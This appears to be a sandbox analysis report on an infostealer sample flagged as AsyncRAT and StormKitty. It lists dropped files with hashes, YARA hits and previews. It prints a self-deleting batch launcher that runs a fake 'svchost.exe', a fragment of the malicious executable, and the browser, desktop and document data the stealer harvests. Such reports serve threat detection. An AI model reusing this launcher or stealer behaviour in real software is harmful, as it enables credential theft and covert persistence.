                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):5.064643106061638
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDCMNqTtvL5ot+kiEaKC5ZACSmqRDt+kiE2J5xAInTRIJhOW1ZPy:hWKqTtT6wknaZ5Omq1wkn23fT5W1k
                                                                  MD5:16EFA3D025FBB6C36676834B1277C189
                                                                  SHA1:CD9086EC5B6C2BCE989E3AAE7DBF1A36795F859D
                                                                  SHA-256:AFD244EC141ECEDD498F3A165C81449555B83F4CA58437CF2B6FF15A68A7FA7D
                                                                  SHA-512:7076C2CE417D4E1E6F151E690B102CE5009064F786174208A9D60276CADD99C195706A3780810CEB109F225BAF13034CB9D44D3138AAB638A2CBD0AC0550F093
                                                                  Malicious:false
                                                                  Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF775.tmp.bat" /f /q..

                                                                  C:\Users\user\AppData\Local\Temp\udwnme.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):179200
                                                                  Entropy (8bit):5.89687638053006
                                                                  Encrypted:false
                                                                  SSDEEP:3072:oe8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gT7wARE+WpCc:86ewwIwQJ6vKX0c5MlYZ0b2c
                                                                  MD5:DA34EA26DDFEDFD7966E8AEDF0BB93E6
                                                                  SHA1:BA30BDE364D564268D175090364158CB66C165A9
                                                                  SHA-256:817940C9DD88C9D185F58532E2027E9DF7BFACA8249EC96AE055DA03C8750F20
                                                                  SHA-512:FBF634FD22EC37A65540C6AD1968B53666308D4D31A151C26B1444E242DE40C95C0F48F96010BC72E5E0E9A10982B4F56590E96ADED12015DE915D7D86AF8DFF
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                  Joe Sandbox View:
                                                                  • Filename: w5APKwp5DD.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0}f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C................................................................*..*....*..*...r...p*..*....*...*...*...*...*...*...*...*..*...*..6.r...p.o....*....*...*...*...*."..s^...*...>..sf...%.}"...*..*...*..0..........s..........o.....o....*..0..........s..........o.....o....*...sV...*2.o....sR...*...2.o....sL...*....0../.......#..........o.... ....(......(....,..*#........*.N...(....(....o....*".o"...i*...&..lo#...*..".o"...k*...&..lo#...*...0.."..........o......(....,..*.

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH.zip

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                  Category:modified
                                                                  Size (bytes):151803
                                                                  Entropy (8bit):7.9282567999403915
                                                                  Encrypted:false
                                                                  SSDEEP:3072:aBmPRb+aoXqB6LVHSa8jdQqkxQAl6tNOS7b65OMkl/uQaPwiFqH4:aBmPRb+aoXqB6LVHSa8j+qkxQA8tNrvI
                                                                  MD5:45C9C8EB8FDA28C578D6B9B518F6669C
                                                                  SHA1:C57DA4DA4807AF2910F50EEC6224297DAB30CC1E
                                                                  SHA-256:6BA1DDF182A34B7BC18C5E428F6F8475BCA89E0FADA8CA24E274EA416EEE9807
                                                                  SHA-512:A581B91AF19B13EE1DEB033482987D520CA4F9E4E055A8D5D908722ECF72EA1F298ACB39526C98932B9F3D1360614489EEF31FADDEEAF4456CE802F2E7820CE7
                                                                  Malicious:false
                                                                  Preview:PK.........F.X................Browsers\Edge\PK........v*.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........v*.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK........v*.X..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK........v*.X..CR5...5.......Directories\Desktop.txteR...0.<k..._..Bk.....o..WW....kq+d....f....k.]-..W.i.... ._w...Jf.h.Z4..#.....H*P.9x..Y.W.@...g\....k,....i... ....&..JH^bQb3"[..5YN<..)...b.....2S.Ra..pR............,#T... .N[..i......

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Browsers\Firefox\Bookmarks.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):105
                                                                  Entropy (8bit):3.8863455911790052
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                  MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                  SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                  SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                  SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                  Malicious:false
                                                                  Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Browsers\Firefox\History.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-8 text
                                                                  Category:dropped
                                                                  Size (bytes):94
                                                                  Entropy (8bit):4.886397362842801
                                                                  Encrypted:false
                                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                  Malicious:false
                                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Browsers\Google\History.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1393
                                                                  Entropy (8bit):5.241470443395582
                                                                  Encrypted:false
                                                                  SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                  MD5:7F24357FFA354F2471DED45552B897D7
                                                                  SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                  SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                  SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                  Malicious:false
                                                                  Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Desktop.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):821
                                                                  Entropy (8bit):5.246999163355071
                                                                  Encrypted:false
                                                                  SSDEEP:24:CZksCekV1LFTNkYQAkfAwO8I+bIPjMMPR0YZI5OLcx0gaaFPRYZX:MeeKj+fTOTPAMP1GNR2X
                                                                  MD5:7D272999F3771275B69C5D01FDE300D3
                                                                  SHA1:5A97E296F4D22652712B13E95AAB3765643982BA
                                                                  SHA-256:84FA0C25B878C62D3FA2AFAC34F6BB459FC9C6CE7A26C19932DC22BBA000E308
                                                                  SHA-512:7DFDB802E44E9A794216C3B345F645811FE3F31B295126697EBF16F6BD8C2AB599A81038C551143C45EFF0B40DBE3CF0386BCF95189903198CFA179E7EB7193E
                                                                  Malicious:false
                                                                  Preview:Desktop\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...Excel.lnk...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg...zrrHgsDzgS.exe..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Documents.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):834
                                                                  Entropy (8bit):5.282690409163236
                                                                  Encrypted:false
                                                                  SSDEEP:24:qZksCeg1LFTNkY+kfAwj9PjM1YZI5OLcx0gaaFPRYZj:0eeijbfThPAaGNR2j
                                                                  MD5:D2A64505CE2CDB3ACC359558743D90D9
                                                                  SHA1:A1C29490252DBF587AE10FA7BA7D9A7947685664
                                                                  SHA-256:8F321EEE94AA42B17CC49846693023D517E193EAB9F5394A06A91C375CA6E0CC
                                                                  SHA-512:02DDACFA7ACD8FF75150D2778F7DB0319E53B7C76E52B4CEA13C58003817355DD8986E6D4646448B3B0BBA6629E44191DA6BF25EB702FF862B00FF4D9A200C7E
                                                                  Malicious:false
                                                                  Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png....ZBEDCJPBEY.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Downloads.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.287107822500106
                                                                  Encrypted:false
                                                                  SSDEEP:6:3tSLKIyeWrhjWvqj0/m/DvROLXovs0OLPFEKC+PJhr4rmsAnThmyGFNos4hwk4q:QLKPeaiCw/m/zoL4vszLPFEK1h9mmsAf
                                                                  MD5:D9614CBA928B54F7FC5B4C0C735D6B78
                                                                  SHA1:40EEF1EE5AF3AB6E97FD76DD125B936FD92A093C
                                                                  SHA-256:D85AA8C4750E3D5273FA7B69C6989B3A3BD02D392A86B05FAE42D615BCF42AAF
                                                                  SHA-512:2486CF1BB34CD3BF82EBBEE3BC0B12821F9F6F6C3EB35F5C6BE64D1E808CC32D2B025AF2E09DA44EC748B67714B6BF66B34FA2A3BE65F503B673116F3F5C0324
                                                                  Malicious:false
                                                                  Preview:Downloads\...desktop.ini...DVWHKMNFNN.mp3...HTAGVDFUIE.png...HTAGVDFUIE.xlsx...KATAXZVCPS.docx...KATAXZVCPS.jpg...KZWFNRXYKI.png...LTKMYBSEYZ.pdf...LTKMYBSEYZ.xlsx...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...WUTJSCBCFX.jpg...YPSIACHYXW.pdf...ZBEDCJPBEY.jpg...ZBEDCJPBEY.mp3..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\OneDrive.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.023465189601646
                                                                  Encrypted:false
                                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                  Malicious:false
                                                                  Preview:OneDrive\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Pictures.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):88
                                                                  Entropy (8bit):4.450045114302317
                                                                  Encrypted:false
                                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                  Malicious:false
                                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Startup.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24
                                                                  Entropy (8bit):4.053508854797679
                                                                  Encrypted:false
                                                                  SSDEEP:3:jgBLKB:j4LKB
                                                                  MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                  SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                  SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                  SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                  Malicious:false
                                                                  Preview:Startup\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Temp.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4580
                                                                  Entropy (8bit):5.289274473813092
                                                                  Encrypted:false
                                                                  SSDEEP:96:4jzcRPTmt6qESfxLJNebQVuLBYwrbIGVy6EdotkTLD8ls6pA2GgcCoXm8LsrOwq:BtbSJLJ4cUtDUKUrpCDq
                                                                  MD5:ED05914E0EABD4F6B2371084616A68D5
                                                                  SHA1:CB0619B619495AD7FE6A530F74A56C466EA5F49A
                                                                  SHA-256:1EFBEA6FD60A1842261AB24F72B5860BC07085F271C38A2346CA4514ED325671
                                                                  SHA-512:F63DBCBF9021383B77AA5A6A8C903F13DC23681F94BE2EDBBA201F00CB43CCEB71DF4D9EBAAE170A973BB4B16BF7C1E1280771EC7702EC7FF6AACDE6445D6662
                                                                  Malicious:false
                                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Directories\Videos.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.7950885863977324
                                                                  Encrypted:false
                                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                  Malicious:false
                                                                  Preview:Videos\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
